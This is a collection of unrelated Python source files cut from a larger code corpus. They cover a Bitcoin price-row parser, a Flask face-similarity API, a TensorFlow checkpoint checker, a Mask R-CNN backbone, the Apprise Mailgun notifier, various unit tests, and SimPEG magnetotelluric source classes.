# Date Open High Low Close Volume (BTC) Volume (Currency) Weighted Price
# 2011-09-13 5.8 6.0 5.65 5.97 58.37138238, 346.0973893944 5.929230648356
if not (line.strip() and line[0].isdigit()): return None
try:
data = line.split(',')
# If value is zero, return None
value = decimal.Decimal(data[4])
if value == 0: return None
coin.Time = datetime.strptime(data[0], "%Y-%m-%d")
coin.Value = value
coin["Open"] = float(data[1])
coin["High"] = float(data[2])
coin["Low"] = float(data[3])
coin["Close"] = float(data[4])
coin["VolumeBTC"] = float(data[5])
coin["VolumeUSD"] = float(data[6])
coin["WeightedPrice"] = float(data[7])
return coin;
except ValueError:
# Do nothing, possible error in json decoding
return None |
py | 7dfd090d19390cc3887ebbc41e1544317820758d | import numpy as np
from vecdb import VecDB
from flask import Flask, request, json, jsonify
from flask_sqlalchemy import SQLAlchemy
from sklearn.metrics.pairwise import cosine_similarity
from datetime import datetime
app = Flask(__name__)
# Database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
db = SQLAlchemy(app)
vdb = VecDB(filepath='data.h5', emb_dim=512)
# Face Model
class Face(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50))
embedding_key = db.Column(db.Integer)
created_at = db.Column(db.DateTime, default=datetime.now)
# Fake ML model
def model():
return np.random.randn(512)
# Routes
@app.route('/store', methods=['POST'])
def store():
name = request.form.get('name')
pred = model()
emb_key = vdb.store(pred)
face = Face(name=name, embedding_key=emb_key)
db.session.add(face)
db.session.commit()
return jsonify({ "status": "ok", "msg": "New face added" })
@app.route('/most_similar', methods=['POST'])
def most_similar():
emb = model()
key = vdb.most(emb, func=cosine_similarity)
face = Face.query.filter_by(embedding_key=int(key)).first()
if face is not None:
return jsonify({ "name": face.name })
return jsonify({ "status": "error", "msg": "Could not compare faces" })
if __name__ == '__main__':
app.run() |
py | 7dfd0992d02804b22aa46d895bb8da4e39a4dd73 | """
Simple script that checks if a checkpoint is corrupted with any inf/NaN values. Run like this:
python inspect_checkpoint.py model.12345
"""
import tensorflow as tf
import sys
import numpy as np
if __name__ == '__main__':
if len(sys.argv) != 2:
raise Exception("Usage: python inspect_checkpoint.py <file_name>\nNote: Do not include the .data .index or .meta part of the model checkpoint in file_name.")
file_name = sys.argv[1]
reader = tf.train.NewCheckpointReader(file_name)
var_to_shape_map = reader.get_variable_to_shape_map()
finite = []
all_infnan = []
some_infnan = []
for key in sorted(var_to_shape_map.keys()):
tensor = reader.get_tensor(key)
print ("key: ", key)
print (tensor.shape)
if np.all(np.isfinite(tensor)):
finite.append(key)
else:
if not np.any(np.isfinite(tensor)):
all_infnan.append(key)
else:
some_infnan.append(key)
print ("\nFINITE VARIABLES:")
for key in finite: print (key)
print ("\n")
print ("finite: ", finite)
print ("\nVARIABLES THAT ARE ALL INF/NAN:")
for key in all_infnan: print (key)
print ("\nVARIABLES THAT CONTAIN SOME FINITE, SOME INF/NAN VALUES:")
for key in some_infnan: print (key)
print ("")
if not all_infnan and not some_infnan:
print ("CHECK PASSED: checkpoint contains no inf/NaN values")
else:
print ("CHECK FAILED: checkpoint contains some inf/NaN values")
|
py | 7dfd0c41f7e10fa822b2beefcd4bb6913acaa8e0 | # -*- coding: utf-8 -*-
import sys
from app.wechat import wechat
if sys.version_info.major != 3:
exit('Please run under Python3')
if __name__ == '__main__':
obj = wechat()
obj.run()
|
py | 7dfd0f65393c61f4802f1d99dec8712b4767e518 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..legacy import antsIntroduction
def test_antsIntroduction_inputs():
input_map = dict(args=dict(argstr='%s',
),
bias_field_correction=dict(argstr='-n 1',
),
dimension=dict(argstr='-d %d',
position=1,
usedefault=True,
),
environ=dict(nohash=True,
usedefault=True,
),
force_proceed=dict(argstr='-f 1',
),
ignore_exception=dict(deprecated='1.0.0',
nohash=True,
usedefault=True,
),
input_image=dict(argstr='-i %s',
copyfile=False,
mandatory=True,
),
inverse_warp_template_labels=dict(argstr='-l',
),
max_iterations=dict(argstr='-m %s',
sep='x',
),
num_threads=dict(nohash=True,
usedefault=True,
),
out_prefix=dict(argstr='-o %s',
usedefault=True,
),
quality_check=dict(argstr='-q 1',
),
reference_image=dict(argstr='-r %s',
copyfile=True,
mandatory=True,
),
similarity_metric=dict(argstr='-s %s',
),
terminal_output=dict(deprecated='1.0.0',
nohash=True,
),
transformation_model=dict(argstr='-t %s',
usedefault=True,
),
)
inputs = antsIntroduction.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_antsIntroduction_outputs():
output_map = dict(affine_transformation=dict(),
input_file=dict(),
inverse_warp_field=dict(),
output_file=dict(),
warp_field=dict(),
)
outputs = antsIntroduction.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
|
py | 7dfd101f7c659900c0fd39f39be906b9459c09d7 | L=[3,5]
L[0:0]= [1,2]
L[3:3]= [4]
L[len(L):len(L)]=[6]
print(L)
L[:]=L[::-1]
print(L) |
py | 7dfd116a1deb520477b0290436d1d36fd4e5a3dd | import math
import numpy as np
import tensorflow.keras.layers as KL
from mrcnn.layers import BatchNorm
############################################################
# Resnet Graph
############################################################
# Code adopted from:
# https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py
def identity_block(input_tensor, kernel_size, filters, stage, block,
use_bias=True, train_bn=True):
"""The identity_block is the block that has no conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a',
use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c',
use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
x = KL.Add()([x, input_tensor])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def conv_block(input_tensor, kernel_size, filters, stage, block,
strides=(2, 2), use_bias=True, train_bn=True):
"""conv_block is the block that has a conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), strides=strides,
name=conv_name_base + '2a', use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base +
'2c', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides,
name=conv_name_base + '1', use_bias=use_bias)(input_tensor)
shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn)
x = KL.Add()([x, shortcut])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def resnet_graph(input_image, architecture, stage5=False, train_bn=True):
"""Build a ResNet graph.
architecture: Can be resnet50 or resnet101
stage5: Boolean. If False, stage5 of the network is not created
train_bn: Boolean. Train or freeze Batch Norm layers
"""
assert architecture in ["resnet50", "resnet101"]
# Stage 1
x = KL.ZeroPadding2D((3, 3))(input_image)
x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x)
x = BatchNorm(name='bn_conv1')(x, training=train_bn)
x = KL.Activation('relu')(x)
C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x)
# Stage 2
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn)
C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn)
# Stage 3
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn)
C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn)
# Stage 4
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn)
block_count = {"resnet50": 5, "resnet101": 22}[architecture]
for i in range(block_count):
x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn)
C4 = x
# Stage 5
if stage5:
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn)
C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn)
else:
C5 = None
return [C1, C2, C3, C4, C5]
|
py | 7dfd11867046d429a132d73377bb2d01b0db4b32 | """Package with meta steps for tests of oneprovider using web GUI.
"""
__author__ = "Michal Stanisz"
__copyright__ = "Copyright (C) 2017 ACK CYFRONET AGH"
__license__ = "This software is released under the MIT license cited in " \
"LICENSE.txt"
|
py | 7dfd11e941777f7b3219e2a16afeb190194c836e | # -*- coding: utf-8 -*-
"""
PyQt5 tutorial
In this example we draw 6 lines using
different pen styles.
author: py40.com
last edited: 2017年3月
"""
import sys
from PyQt5.QtWidgets import QWidget, QApplication
from PyQt5.QtGui import QPainter, QColor, QPen
from PyQt5.QtCore import Qt
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setGeometry(300, 300, 280, 270)
self.setWindowTitle('Pen styles')
self.show()
def paintEvent(self, e):
qp = QPainter()
qp.begin(self)
self.drawLines(qp)
qp.end()
def drawLines(self, qp):
pen = QPen(Qt.black, 2, Qt.SolidLine)
qp.setPen(pen)
qp.drawLine(20, 40, 250, 40)
pen.setStyle(Qt.DashLine)
qp.setPen(pen)
qp.drawLine(20, 80, 250, 80)
pen.setStyle(Qt.DashDotLine)
qp.setPen(pen)
qp.drawLine(20, 120, 250, 120)
pen.setStyle(Qt.DotLine)
qp.setPen(pen)
qp.drawLine(20, 160, 250, 160)
pen.setStyle(Qt.DashDotDotLine)
qp.setPen(pen)
qp.drawLine(20, 200, 250, 200)
pen.setStyle(Qt.CustomDashLine)
pen.setDashPattern([1, 4, 5, 4])
qp.setPen(pen)
qp.drawLine(20, 240, 250, 240)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
|
py | 7dfd120a2408f689e35fa276a11d05bcb375fb71 | from marionette_driver.errors import JavascriptException
from marionette_harness import MarionetteTestCase
import testsuite
class Test(MarionetteTestCase):
def setUp(self):
MarionetteTestCase.setUp(self)
ts = testsuite.TestSuite()
self.ts = ts
self.marionette.set_pref("network.proxy.allow_hijacking_localhost", False)
def test_svg(self):
m = self.marionette
svg_enabled = self.ts.t['test']['name'] == 'svg-enable'
self.assertEqual(self.marionette.get_pref('svg.disabled'),
not svg_enabled,
msg="svg.disabled is not set correctly")
self.marionette.timeout.implicit = 1
with m.using_context('content'):
# img src url
m.navigate(self.marionette.absolute_url("svg/img_src_url.html"))
svg_elt = m.find_element('id', 'svgImgElem')
self.assertEqual(svg_elt.get_property('width'),
450 if svg_enabled else 24,
msg="img src url")
# img data url
m.navigate(self.marionette.absolute_url("svg/img_data_url.html"))
svg_elt = m.find_element('id', 'svgImgElem')
self.assertEqual(svg_elt.get_property('width'),
300 if svg_enabled else 24,
msg="img data url")
# object data url
m.navigate(self.marionette.absolute_url("svg/object_data_url.html"))
width = m.execute_script('''
var elt = document.getElementById("svgObjectElem");
return elt.getBoundingClientRect().width;
''')
self.assertEqual(width,
450 if svg_enabled else 300,
msg="object data url")
# object remote url
m.navigate(self.marionette.absolute_url("svg/object_remote_url.html"))
svg_elt = m.find_element('id', 'svgObjectElem')
width = m.execute_script('''
var elt = document.getElementById("svgObjectElem");
return elt.getBoundingClientRect().width;
''')
self.assertEqual(width,
450 if svg_enabled else 300,
msg="object remote url")
# inline svg
m.navigate(self.marionette.absolute_url("svg/inline_svg.html"))
try:
elt_width = m.execute_script('''
var elt = document.getElementById("inlineSVG");
return elt.width.baseVal.value;
''')
except JavascriptException:
elt_width = None
self.assertEqual(elt_width,
300 if svg_enabled else None,
msg='inline svg')
# iframe remote url
m.navigate(self.marionette.absolute_url("svg/iframe_remote_url.html"))
m.switch_to_frame(m.find_element('id', 'svgIframeElem'))
svg_elt = m.find_element('tag name', 'svg')
width = m.execute_script('''
var elt = document.getElementsByTagName("svg")[0];
return elt.getBoundingClientRect().width;
''')
self.assertEqual(width,
450 if svg_enabled else 500,
msg="iframe remote url prompt")
|
py | 7dfd123718e5bf455f9b765c57a115ec8aee43c1 | # -*- coding: utf-8 -*-
import unittest
from letter_combinations import letter_combinations
class TestLetterCombinations(unittest.TestCase):
def test_letter_combinations(self):
tests = [
('', []),
('9', ["w", "x", "y", "z"]),
('91', ["w", "x", "y", "z"]),
('23', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]),
('213', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]),
('123', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]),
('231', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]),
('111111', []),
]
for test in tests:
actual = letter_combinations(test[0])
expected = test[1]
self.assertEqual(len(actual), len(expected), \
'expected {} should have the same length as actual {}'\
.format(test, actual))
for exp in expected:
self.assertIn(exp, actual, \
'expected {} to be in actual {}'.format(exp, actual))
|
py | 7dfd1248df97a3921947b48a98914ab3a426274c | # -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Chris Caron <[email protected]>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Signup @ https://www.mailgun.com/
#
# Each domain will have an API key associated with it. If you sign up you'll
# get a sandbox domain to use. Or if you set up your own, they'll have
# api keys associated with them too. Find your API key out by visiting
# https://app.mailgun.com/app/domains
#
# From here you can click on the domain you're interested in. You can acquire
# the API Key from here which will look something like:
# 4b4f2918c6c21ba0a26ad2af73c07f4d-dk5f51da-8f91a0df
#
# You'll also need to know the domain that is associated with your API key.
# This will be obvious with a paid account because it will be the domain name
# you've registered with them. But if you're using a test account, it will
# be name of the sandbox you've set up such as:
# sandbox74bda3414c06kb5acb946.mailgun.org
#
# Knowing this, you can buid your mailgun url as follows:
# mailgun://{user}@{domain}/{apikey}
# mailgun://{user}@{domain}/{apikey}/{email}
#
# You can email as many addresses as you want as:
# mailgun://{user}@{domain}/{apikey}/{email1}/{email2}/{emailN}
#
# The {user}@{domain} effectively assembles the 'from' email address
# the email will be transmitted from. If no email address is specified
# then it will also become the 'to' address as well.
#
import requests
from .NotifyBase import NotifyBase
from ..common import NotifyType
from ..utils import parse_list
from ..utils import is_email
from ..utils import validate_regex
from ..AppriseLocale import gettext_lazy as _
# Provide some known codes Mailgun uses and what they translate to:
# Based on https://documentation.mailgun.com/en/latest/api-intro.html#errors
MAILGUN_HTTP_ERROR_MAP = {
400: 'A bad request was made to the server.',
401: 'The provided API Key was not valid.',
402: 'The request failed for a reason out of your control.',
404: 'The requested API query is not valid.',
413: 'Provided attachment is to big.',
}
# Priorities
class MailgunRegion(object):
US = 'us'
EU = 'eu'
# Mailgun APIs
MAILGUN_API_LOOKUP = {
MailgunRegion.US: 'https://api.mailgun.net/v3/',
MailgunRegion.EU: 'https://api.eu.mailgun.net/v3/',
}
# A List of our regions we can use for verification
MAILGUN_REGIONS = (
MailgunRegion.US,
MailgunRegion.EU,
)
class NotifyMailgun(NotifyBase):
"""
A wrapper for Mailgun Notifications
"""
# The default descriptive name associated with the Notification
service_name = 'Mailgun'
# The services URL
service_url = 'https://www.mailgun.com/'
# All notification requests are secure
secure_protocol = 'mailgun'
# Mailgun advertises they allow 300 requests per minute.
# 60/300 = 0.2
request_rate_per_sec = 0.20
# A URL that takes you to the setup/help of the specific protocol
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_mailgun'
# The default region to use if one isn't otherwise specified
mailgun_default_region = MailgunRegion.US
# Define object templates
templates = (
'{schema}://{user}@{host}:{apikey}/',
'{schema}://{user}@{host}:{apikey}/{targets}',
)
# Define our template tokens
template_tokens = dict(NotifyBase.template_tokens, **{
'user': {
'name': _('User Name'),
'type': 'string',
'required': True,
},
'host': {
'name': _('Domain'),
'type': 'string',
'required': True,
},
'apikey': {
'name': _('API Key'),
'type': 'string',
'private': True,
'required': True,
},
'targets': {
'name': _('Target Emails'),
'type': 'list:string',
},
})
# Define our template arguments
template_args = dict(NotifyBase.template_args, **{
'name': {
'name': _('From Name'),
'type': 'string',
'map_to': 'from_name',
},
'region': {
'name': _('Region Name'),
'type': 'choice:string',
'values': MAILGUN_REGIONS,
'default': MailgunRegion.US,
'map_to': 'region_name',
},
'to': {
'alias_of': 'targets',
},
})
def __init__(self, apikey, targets, from_name=None, region_name=None,
**kwargs):
"""
Initialize Mailgun Object
"""
super(NotifyMailgun, self).__init__(**kwargs)
# API Key (associated with project)
self.apikey = validate_regex(apikey)
if not self.apikey:
msg = 'An invalid Mailgun API Key ' \
'({}) was specified.'.format(apikey)
self.logger.warning(msg)
raise TypeError(msg)
# Validate our username
if not self.user:
msg = 'No Mailgun username was specified.'
self.logger.warning(msg)
raise TypeError(msg)
# Parse our targets
self.targets = parse_list(targets)
# Store our region
try:
self.region_name = self.mailgun_default_region \
if region_name is None else region_name.lower()
if self.region_name not in MAILGUN_REGIONS:
# allow the outer except to handle this common response
raise
except:
# Invalid region specified
msg = 'The Mailgun region specified ({}) is invalid.' \
.format(region_name)
self.logger.warning(msg)
raise TypeError(msg)
# Get our From username (if specified)
self.from_name = from_name
# Get our from email address
self.from_addr = '{user}@{host}'.format(user=self.user, host=self.host)
if not is_email(self.from_addr):
# Parse Source domain based on from_addr
msg = 'Invalid ~From~ email format: {}'.format(self.from_addr)
self.logger.warning(msg)
raise TypeError(msg)
def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):
"""
Perform Mailgun Notification
"""
# error tracking (used for function return)
has_error = False
# Prepare our headers
headers = {
'User-Agent': self.app_id,
'Accept': 'application/json',
}
# Prepare our payload
payload = {
'from': '{name} <{addr}>'.format(
name=self.app_id if not self.from_name else self.from_name,
addr=self.from_addr),
'subject': title,
'text': body,
}
# Prepare our URL as it's based on our hostname
url = '{}{}/messages'.format(
MAILGUN_API_LOOKUP[self.region_name], self.host)
# Create a copy of the targets list
emails = list(self.targets)
if len(emails) == 0:
# No email specified; use the from
emails.append(self.from_addr)
while len(emails):
# Get our email to notify
email = emails.pop(0)
# Prepare our user
payload['to'] = '{} <{}>'.format(email, email)
# Some Debug Logging
self.logger.debug('Mailgun POST URL: {} (cert_verify={})'.format(
url, self.verify_certificate))
self.logger.debug('Mailgun Payload: {}' .format(payload))
# Always call throttle before any remote server i/o is made
self.throttle()
try:
r = requests.post(
url,
auth=("api", self.apikey),
data=payload,
headers=headers,
verify=self.verify_certificate,
)
if r.status_code != requests.codes.ok:
# We had a problem
status_str = \
NotifyBase.http_response_code_lookup(
r.status_code, MAILGUN_API_LOOKUP)
self.logger.warning(
'Failed to send Mailgun notification to {}: '
'{}{}error={}.'.format(
email,
status_str,
', ' if status_str else '',
r.status_code))
self.logger.debug(
'Response Details:\r\n{}'.format(r.content))
# Mark our failure
has_error = True
continue
else:
self.logger.info(
'Sent Mailgun notification to {}.'.format(email))
except requests.RequestException as e:
self.logger.warning(
'A Connection error occured sending Mailgun:%s ' % (
email) + 'notification.'
)
self.logger.debug('Socket Exception: %s' % str(e))
# Mark our failure
has_error = True
continue
return not has_error
def url(self, privacy=False, *args, **kwargs):
"""
Returns the URL built dynamically based on specified arguments.
"""
# Define any arguments set
args = {
'format': self.notify_format,
'overflow': self.overflow_mode,
'verify': 'yes' if self.verify_certificate else 'no',
'region': self.region_name,
}
if self.from_name is not None:
# from_name specified; pass it back on the url
args['name'] = self.from_name
return '{schema}://{user}@{host}/{apikey}/{targets}/?{args}'.format(
schema=self.secure_protocol,
host=self.host,
user=NotifyMailgun.quote(self.user, safe=''),
apikey=self.pprint(self.apikey, privacy, safe=''),
targets='/'.join(
[NotifyMailgun.quote(x, safe='') for x in self.targets]),
args=NotifyMailgun.urlencode(args))
@staticmethod
def parse_url(url):
"""
Parses the URL and returns enough arguments that can allow
us to substantiate this object.
"""
results = NotifyBase.parse_url(url)
if not results:
# We're done early as we couldn't load the results
return results
# Get our entries; split_path() looks after unquoting content for us
# by default
results['targets'] = NotifyMailgun.split_path(results['fullpath'])
# Our very first entry is reserved for our api key
try:
results['apikey'] = results['targets'].pop(0)
except IndexError:
# We're done - no API Key found
results['apikey'] = None
if 'name' in results['qsd'] and len(results['qsd']['name']):
# Extract from name to associate with from address
results['from_name'] = \
NotifyMailgun.unquote(results['qsd']['name'])
if 'region' in results['qsd'] and len(results['qsd']['region']):
# Extract from name to associate with from address
results['region_name'] = \
NotifyMailgun.unquote(results['qsd']['region'])
# Support the 'to' variable so that we can support targets this way too
# The 'to' makes it easier to use yaml configuration
if 'to' in results['qsd'] and len(results['qsd']['to']):
results['targets'] += \
NotifyMailgun.parse_list(results['qsd']['to'])
return results
|
py | 7dfd12afeb254731576fdb52ac87f249536e7e6b | # Copyright 2018 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import charm.vault_utils as vault_utils
import charms_openstack.test_utils as test_utils
class TestVaultUtils(test_utils.PatchHelper):
def test_retrieve_secret_id(self):
self.patch_object(vault_utils, 'hvac')
hvac_client = mock.MagicMock()
self.hvac.Client.return_value = hvac_client
response = mock.MagicMock()
response.status_code = 200
response.json.return_value = {'data': {'secret_id': 'FAKE_SECRET_ID'}}
hvac_client._post.return_value = response
self.assertEqual(
vault_utils.retrieve_secret_id('url', 'token'), 'FAKE_SECRET_ID')
hvac_client._post.assert_called_with('/v1/sys/wrapping/unwrap')
|
py | 7dfd12c0d3b38c6238ae2cf1d7aae5304cce34d8 | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import numpy as np
import scipy.sparse as sp
from SimPEG import Maps, mkvc
from SimPEG.EM.FDEM.SrcFDEM import BaseFDEMSrc as FDEMBaseSrc
from SimPEG.EM.Utils import omega
from .Utils.sourceUtils import homo1DModelSource
#################
### Sources ###
#################
class BaseNSEMSrc(FDEMBaseSrc):
'''
Sources for the NSEM problem.
Use the SimPEG BaseSrc, since the source fields share properties with the transmitters.
:param float freq: The frequency of the source
:param list rxList: A list of receivers associated with the source
'''
freq = None #: Frequency (float)
def __init__(self, rxList, freq):
self.freq = float(freq)
FDEMBaseSrc.__init__(self, rxList)
# 1D sources
class Planewave_xy_1DhomotD(BaseNSEMSrc):
"""
NSEM source for both polarizations (x and y) for the total Domain.
It calculates fields calculated based on conditions on the boundary of the domain.
"""
def __init__(self, rxList, freq):
BaseNSEMSrc.__init__(self, rxList, freq)
# Need to implement such that it works for all dims.
# Rename to be more descriptive
class Planewave_xy_1Dprimary(BaseNSEMSrc):
"""
NSEM planewave source for both polarizations (x and y)
estimated from a single 1D primary models.
"""
def __init__(self, rxList, freq):
# assert mkvc(self.mesh.hz.shape,1) == mkvc(sigma1d.shape,1),'The number of values in the 1D background model does not match the number of vertical cells (hz).'
self.sigma1d = None
BaseNSEMSrc.__init__(self, rxList, freq)
def ePrimary(self, problem):
# Get primary fields for both polarizations
if self.sigma1d is None:
# Set the sigma1d as the 1st column in the background model
if len(problem._sigmaPrimary) == problem.mesh.nC:
if problem.mesh.dim == 1:
self.sigma1d = problem.mesh.r(
problem._sigmaPrimary, 'CC', 'CC', 'M')[:]
elif problem.mesh.dim == 3:
self.sigma1d = problem.mesh.r(
problem._sigmaPrimary, 'CC', 'CC', 'M')[0, 0, :]
# Or as the 1D model that matches the vertical cell number
elif len(problem._sigmaPrimary) == problem.mesh.nCz:
self.sigma1d = problem._sigmaPrimary
if self._ePrimary is None:
self._ePrimary = homo1DModelSource(
problem.mesh, self.freq, self.sigma1d)
return self._ePrimary
def bPrimary(self, problem):
# Project ePrimary to bPrimary
# Satisfies the primary(background) field conditions
if problem.mesh.dim == 1:
C = problem.mesh.nodalGrad
elif problem.mesh.dim == 3:
C = problem.mesh.edgeCurl
bBG_bp = (- C * self.ePrimary(problem)) * (1 / (1j * omega(self.freq)))
return bBG_bp
def S_e(self, problem):
"""
Get the electrical field source
"""
e_p = self.ePrimary(problem)
Map_sigma_p = Maps.SurjectVertical1D(problem.mesh)
sigma_p = Map_sigma_p._transform(self.sigma1d)
# Make mass matrix
# Note: M(sig) - M(sig_p) = M(sig - sig_p)
# Need to deal with the edge/face discrepencies between 1d/2d/3d
if problem.mesh.dim == 1:
Mesigma = problem.mesh.getFaceInnerProduct(problem.sigma)
Mesigma_p = problem.mesh.getFaceInnerProduct(sigma_p)
if problem.mesh.dim == 2:
pass
if problem.mesh.dim == 3:
Mesigma = problem.MeSigma
Mesigma_p = problem.mesh.getEdgeInnerProduct(sigma_p)
return (Mesigma - Mesigma_p) * e_p
def S_eDeriv(self, problem, v, adjoint=False):
"""
The derivative of S_e with respect to
"""
return self.S_eDeriv_m(problem, v, adjoint)
def S_eDeriv_m(self, problem, v, adjoint=False):
'''
Get the derivative of S_e wrt to sigma (m)
'''
# Need to deal with
if problem.mesh.dim == 1:
# Need to use the faceInnerProduct
ePri = self.ePrimary(problem)[:, 1]
MsigmaDeriv = (
problem.mesh.getFaceInnerProductDeriv(problem.sigma)(ePri) *
problem.sigmaDeriv)
# MsigmaDeriv = ( MsigmaDeriv * MsigmaDeriv.T)**2
if adjoint:
#
return MsigmaDeriv.T * v
else:
# v should be nC size
return MsigmaDeriv * v
if problem.mesh.dim == 2:
raise NotImplementedError('The NSEM 2D problem is not implemented')
if problem.mesh.dim == 3:
# Need to take the derivative of both u_px and u_py
# And stack them to be of the correct size
e_p = self.ePrimary(problem)
if adjoint:
return (
problem.MeSigmaDeriv(
e_p[:, 0], v[:int(v.shape[0]/2)], adjoint
) +
problem.MeSigmaDeriv(
e_p[:, 1], v[int(v.shape[0]/2):], adjoint
)
)
# return sp.hstack((
# problem.MeSigmaDeriv(e_p[:, 0]).T,
# problem.MeSigmaDeriv(e_p[:, 1]).T)) * v
else:
return np.hstack((
mkvc(problem.MeSigmaDeriv(e_p[:, 0], v, adjoint), 2),
mkvc(problem.MeSigmaDeriv(e_p[:, 1], v, adjoint), 2)))
class Planewave_xy_3Dprimary(BaseNSEMSrc):
"""
NSEM source for both polarizations (x and y) given a 3D primary model.
It assigns fields calculated from the 1D model
as fields in the full space of the problem.
"""
def __init__(self, rxList, freq):
# assert mkvc(self.mesh.hz.shape,1) == mkvc(sigma1d.shape,1),'The number of values in the 1D background model does not match the number of vertical cells (hz).'
self.sigmaPrimary = None
BaseNSEMSrc.__init__(self, rxList, freq)
# Hidden property of the ePrimary
self._ePrimary = None
def ePrimary(self, problem):
# Get primary fields for both polarizations
self.sigmaPrimary = problem._sigmaPrimary
if self._ePrimary is None:
self._ePrimary = homo3DModelSource(
